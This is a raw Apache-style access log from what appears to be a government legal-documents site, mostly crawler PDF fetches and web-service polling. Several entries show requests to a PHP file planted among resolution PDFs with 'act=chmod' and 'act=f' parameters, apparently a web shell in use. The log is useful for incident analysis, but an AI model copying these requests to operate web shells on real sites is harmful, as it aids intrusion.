201.245.192.253 - - [29/Jun/2024:17:28:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.11 - - [29/Jun/2024:17:28:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1342.pdf HTTP/1.1" 200 593675
201.245.192.253 - - [29/Jun/2024:17:28:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:29:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35618
66.249.66.12 - - [29/Jun/2024:17:29:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201201-1250/20021220.tif HTTP/1.1" 200 43016
201.245.192.253 - - [29/Jun/2024:17:29:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:29:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:17:29:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35140
66.249.66.11 - - [29/Jun/2024:17:30:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2534.pdf HTTP/1.1" 200 389141
201.245.192.253 - - [29/Jun/2024:17:30:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:17:31:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2439.pdf HTTP/1.1" 200 361150
216.245.221.92 - - [29/Jun/2024:17:31:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:17:31:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:31:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [29/Jun/2024:17:32:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0627.pdf HTTP/1.1" 200 524622
47.128.126.229 - - [29/Jun/2024:17:32:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3668.pdf HTTP/1.1" 200 2716
66.249.66.13 - - [29/Jun/2024:17:32:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0869.pdf HTTP/1.1" 200 345659
172.22.2.4 - - [29/Jun/2024:17:32:08 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-035-16.docx HTTP/1.1" 304 -
47.128.39.101 - - [29/Jun/2024:17:32:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=6509.pdf HTTP/1.1" 200 2740
47.128.49.155 - - [29/Jun/2024:17:32:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=bogota-y-las-regiones-trazan-hoja-de-ruta-para-desarrollar-planes-de-manejo-de-paramos.html HTTP/1.1" 200 2716
47.128.30.222 - - [29/Jun/2024:17:32:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5925.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [29/Jun/2024:17:32:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.98.151 - - [29/Jun/2024:17:32:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=03479.pdf HTTP/1.1" 200 2716
172.22.2.4 - - [29/Jun/2024:17:31:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.69.236.198 - - [29/Jun/2024:17:33:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0432.pdf HTTP/1.1" 200 478411
190.69.236.198 - - [29/Jun/2024:17:33:01 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [29/Jun/2024:17:33:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.11 - - [29/Jun/2024:17:33:07 -0500] "GET /BLA/resoluciones/AUTOS%202023/3064.pdf HTTP/1.1" 200 370886
66.249.66.11 - - [29/Jun/2024:17:33:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0800.pdf HTTP/1.1" 200 269216
47.128.122.130 - - [29/Jun/2024:17:33:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3327.pdf HTTP/1.1" 200 2716
47.128.30.168 - - [29/Jun/2024:17:33:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=6500.pdf HTTP/1.1" 200 2741
47.128.30.176 - - [29/Jun/2024:17:33:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3552.pdf HTTP/1.1" 200 2716
47.128.27.4 - - [29/Jun/2024:17:33:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3046.pdf HTTP/1.1" 200 2716
172.22.2.4 - - [29/Jun/2024:17:32:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53419
201.245.192.253 - - [29/Jun/2024:17:33:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:33:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.30.116 - - [29/Jun/2024:17:34:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=2629.pdf HTTP/1.1" 200 2716
66.249.66.12 - - [29/Jun/2024:17:34:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0644.pdf HTTP/1.1" 200 480650
172.22.2.4 - - [29/Jun/2024:17:32:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56191
201.245.192.253 - - [29/Jun/2024:17:34:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:17:35:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2402.pdf HTTP/1.1" 200 360277
201.245.192.253 - - [29/Jun/2024:17:35:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:35:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [29/Jun/2024:17:36:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0042.pdf HTTP/1.1" 200 454584
